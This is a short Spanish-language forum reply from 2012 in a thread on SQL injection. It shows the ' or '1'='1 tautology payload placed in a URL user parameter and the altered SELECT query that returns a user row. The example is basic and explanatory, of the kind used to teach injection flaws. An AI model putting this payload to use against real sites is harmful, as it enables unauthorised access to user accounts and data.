06/03/2012, 11:02
|
 | | | Fecha de Ingreso: julio-2008 Ubicación: Buenos Aires ! :D
Mensajes: 814
Antigüedad: 16 años, 6 meses Puntos: 103 | |
| Respuesta: SQL inyection
mira, prueba con el siguiente user:
' or '1'='1
entonces vas a:
index.php?user=' or '1'='1
y el select te va a quedar asi:
SELECT * FROM usuarios WHERE user = '' or '1'='1'
entonces, este select va a seleccionar creo que el primer usuario en la tabla
saludos |